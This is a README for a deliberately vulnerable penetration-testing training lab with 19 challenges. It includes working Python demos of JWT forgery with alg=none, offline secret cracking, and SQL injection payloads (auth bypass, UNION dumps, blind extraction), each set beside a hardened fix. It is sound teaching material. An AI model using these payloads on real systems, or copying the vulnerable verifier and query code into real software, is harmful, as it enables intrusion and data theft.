An intentionally vulnerable web application for learning penetration testing techniques.
```text
╔═══════════════════════════════════════════════════════════════╗
║ ██████╗ ███████╗███╗ ██╗████████╗███████╗███████╗████████╗ ║
║ ██╔══██╗██╔════╝████╗ ██║╚══██╔══╝██╔════╝██╔════╝╚══██╔══╝ ║
║ ██████╔╝█████╗ ██╔██╗ ██║ ██║ █████╗ ███████╗ ██║ ║
║ ██╔═══╝ ██╔══╝ ██║╚██╗██║ ██║ ██╔══╝ ╚════██║ ██║ ║
║ ██║ ███████╗██║ ╚████║ ██║ ███████╗███████║ ██║ ║
║ ╚═╝ ╚══════╝╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚══════╝ ╚═╝ ║
╚═══════════════════════════════════════════════════════════════╝
```
⭐ If you find this useful, please star this repo! It's free, helps others discover it, and motivates continued development.
A hands-on security training lab with 19 progressive challenges covering:
- Authentication bypass (JWT attacks, weak passwords)
- Authorization flaws (IDOR, privilege escalation)
- File security (upload bypass, path traversal)
- SQL injection (error-based, UNION, blind, auth bypass)
- Business logic exploitation
- WAF evasion techniques
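The JWT attacks named above come down to two server-side mistakes: a verifier that believes whatever `alg` the token's own header claims, and a signing secret weak enough to brute-force offline. The block below is an added example, not code from this lab, showing both against a minimal HS256 verifier and the hardened verifier that stops them. `SERVER_SECRET`, the claims and `WORDLIST` are constructed for the example; which of these variants each lab challenge actually uses is not stated on this page.

```python
"""Added example for the JWT challenges (not the lab's own code).

verify_naive() takes the algorithm from the token header, so an attacker can
strip the signature with alg=none, and it compares signatures with ==.
verify_hardened() pins HS256 server-side and compares in constant time.
crack_secret() shows why a weak secret is as bad as no signature at all.
"""
import base64
import hashlib
import hmac
import json

SERVER_SECRET = "secret123"                                # constructed weak secret
WORDLIST = ["password", "changeme", "secret123", "admin"]  # constructed wordlist


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _json(obj) -> bytes:
    return json.dumps(obj, separators=(",", ":")).encode()


def _hs256(secret: str, signing_input: str) -> bytes:
    return hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()


def sign_hs256(payload: dict, secret: str) -> str:
    header = b64url(_json({"alg": "HS256", "typ": "JWT"}))
    body = b64url(_json(payload))
    signing_input = f"{header}.{body}"
    return f"{signing_input}.{b64url(_hs256(secret, signing_input))}"


def verify_naive(token: str, secret: str):
    """VULNERABLE: the algorithm is read from attacker-controlled input."""
    header_b64, body_b64, sig_b64 = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(body_b64))
    alg = str(header.get("alg", "")).lower()
    if alg == "none":                       # unsigned token accepted as-is
        return payload
    if alg == "hs256":
        expected = b64url(_hs256(secret, f"{header_b64}.{body_b64}"))
        if expected == sig_b64:             # also not a constant-time compare
            return payload
    return None


def verify_hardened(token: str, secret: str):
    """FIXED: algorithm pinned by the server; signature checked before any claim is trusted."""
    try:
        header_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(header_b64))
        sig = b64url_decode(sig_b64)
    except (ValueError, json.JSONDecodeError):
        return None
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    expected = _hs256(secret, f"{header_b64}.{body_b64}")
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(b64url_decode(body_b64))


def forge_alg_none(token: str, new_claims: dict) -> str:
    """Rewrite the header to alg=none, change claims, drop the signature."""
    _, body_b64, _ = token.split(".")
    payload = json.loads(b64url_decode(body_b64))
    payload.update(new_claims)
    header = b64url(_json({"alg": "none", "typ": "JWT"}))
    return f"{header}.{b64url(_json(payload))}."


def crack_secret(token: str, wordlist):
    """Offline brute force of an HS256 secret: no requests to the server needed."""
    header_b64, body_b64, sig_b64 = token.split(".")
    target = b64url_decode(sig_b64)
    for guess in wordlist:
        if hmac.compare_digest(_hs256(guess, f"{header_b64}.{body_b64}"), target):
            return guess
    return None


if __name__ == "__main__":
    token = sign_hs256({"sub": "alice", "role": "user"}, SERVER_SECRET)
    forged = forge_alg_none(token, {"role": "admin"})
    print("naive verifier on alg=none token:   ", verify_naive(forged, SERVER_SECRET))
    print("hardened verifier on alg=none token:", verify_hardened(forged, SERVER_SECRET))
    secret = crack_secret(token, WORDLIST)
    print("recovered secret:", secret)
    print("minted admin token verifies:", verify_hardened(
        sign_hs256({"sub": "alice", "role": "admin"}, secret), SERVER_SECRET))
```

The fix is not "reject alg=none"; it is never reading the algorithm from the token at all. A real deployment should also use a library that takes an explicit allowed-algorithm list and a secret with at least 256 bits of entropy.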
100% free and open source — perfect for students, developers, and security enthusiasts.
```bash
# Install backend dependencies
cd backend && npm install && cd ..

# Start the lab
python start_lab.py
```

Open http://localhost:3000 in your browser.
| # | Challenge | Category | Difficulty |
|---|---|---|---|
| 1 | Hardcoded Credentials | Warmup | ⭐ Easy |
| 2 | Client-Side Logic | Warmup | ⭐ Easy |
| 3 | Initial Access | Authentication | ⭐ Beginner |
| 4 | Information Disclosure | Reconnaissance | ⭐ Beginner |
| 5 | Token Analysis | Authentication | ⭐⭐ Intermediate |
| 6 | Weak Secrets | Authentication | ⭐⭐ Intermediate |
| 7 | Algorithm Confusion | Authentication | ⭐⭐ Intermediate |
| 8 | Access Control Bypass | Authorization | ⭐⭐ Intermediate |
| 9 | Privilege Escalation | Authorization | ⭐⭐⭐ Advanced |
| 10 | File Upload Vulnerabilities | File Security | ⭐⭐⭐ Advanced |
| 11 | Path Traversal | File Security | ⭐⭐ Intermediate |
| 12 | Business Logic Flaws | Business Logic | ⭐⭐⭐ Advanced |
| 13 | Security Control Bypass | WAF Bypass | ⭐⭐⭐⭐ Expert |
| 14 | Attack Chain | Full Chain | ⭐⭐⭐⭐ Expert |
| 15 | SQLi - Error Based | SQL Injection | ⭐ Beginner |
| 16 | SQLi - UNION Based | SQL Injection | ⭐⭐ Intermediate |
| 17 | SQLi - Auth Bypass | SQL Injection | ⭐⭐ Intermediate |
| 18 | Blind SQL Injection | SQL Injection | ⭐⭐⭐ Advanced |
| 19 | Schema Extraction | SQL Injection | ⭐⭐⭐ Advanced |
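Challenges 15 to 19 are five views of one bug: user input spliced into a login query. As an added example, not the lab's own code, the block below builds a throwaway SQLite table and runs each variation (error-based detection, auth bypass, UNION data dump, boolean-based blind extraction, schema extraction) against a string-concatenated query, then shows the parameterised form that defeats all of them. The table contents and query shape are assumptions; the lab's backend is Node and its real queries are not shown on this page.

```python
"""Added example for the SQL injection challenges (not the lab's own code).

Runs against an in-memory SQLite database seeded with constructed users.
vulnerable_query() builds SQL by string formatting; login_fixed() binds
parameters so the same inputs are treated as data, not SQL.
"""
import sqlite3

SEED_USERS = [  # constructed sample data
    ("admin", "S3cretAdminPw!", "admin"),
    ("alice", "alicepw", "user"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)", SEED_USERS)
    return conn


def vulnerable_query(conn, username, password):
    """VULNERABLE: input is spliced straight into the SQL text."""
    sql = f"SELECT username, role FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchall()


def login_vulnerable(conn, username, password):
    rows = vulnerable_query(conn, username, password)
    return rows[0] if rows else None


def login_fixed(conn, username, password):
    """FIXED: parameter binding; the query structure cannot be changed by input."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def detect_error_based(conn):
    """Challenge-15 style: a lone quote breaks the statement and the error leaks."""
    try:
        vulnerable_query(conn, "'", "zzz")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def auth_bypass(conn):
    """Challenge-17 style: comment out the password check entirely."""
    return login_vulnerable(conn, "admin'--", "irrelevant")


def union_dump(conn):
    """Challenge-16 style: append a SELECT with the same column count."""
    return vulnerable_query(conn, "' UNION SELECT username, password FROM users--", "zzz")


def schema_dump(conn):
    """Challenge-19 style: SQLite keeps its schema in sqlite_master."""
    return vulnerable_query(conn, "' UNION SELECT name, sql FROM sqlite_master--", "zzz")


def blind_extract_password(conn, username, max_len=32):
    """Challenge-18 style: no data in the response, only row / no row per guess."""
    charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = f"{username}' AND substr(password,{pos},1)='{ch}'--"
            if vulnerable_query(conn, payload, "zzz"):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("error-based probe:", detect_error_based(conn))
    print("auth bypass:", auth_bypass(conn))
    print("union dump:", union_dump(conn))
    print("schema:", schema_dump(conn))
    print("blind-extracted admin password:", blind_extract_password(conn, "admin"))
    print("same bypass against fixed login:", login_fixed(conn, "admin'--", "irrelevant"))
```

The blind extractor is deliberately the slow version (one query per candidate character); a binary search on `unicode(substr(...))` cuts it to about seven queries per character, which is what tools such as sqlmap do. Note also that the fixed login still compares plaintext passwords; parameterisation fixes the injection, not the credential storage.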
- 19 Progressive Challenges — From warmup to expert
- Progressive Hints — 3 levels: vague → specific → solution
- Real-World Examples — Learn from actual breaches (Equifax, Parler, etc.)
- Security Report — Full vulnerability assessment included
- Keyboard Shortcuts — Power-user friendly (1-5, R, ?)
- Nordic Dark Theme — Easy on the eyes
```text
├── start_lab.py        # Lab launcher
├── demo_exploit.py     # Demo script (captures 3 flags)
├── frontend/           # Dashboard UI
│   ├── index.html
│   ├── styles.css
│   └── app.js
├── backend/            # Vulnerable API
│   ├── server.js
│   ├── routes/
│   └── config/
└── docs/
    └── SECURITY_REPORT.md
```
This lab is intentionally vulnerable. Run it only in an isolated environment (a VM or container on a network you control), keep it bound to localhost, and never expose it to the internet.
Found a bug or want to add a challenge? PRs welcome!
Educational use only.
If this lab helped you learn something new:
- Star this repository: It takes 1 second and helps others find it
- Share with friends: Tweet it, post on LinkedIn, tell your colleagues
- Report issues: Help improve the lab for everyone
Every star helps more people discover free security education. Thank you!
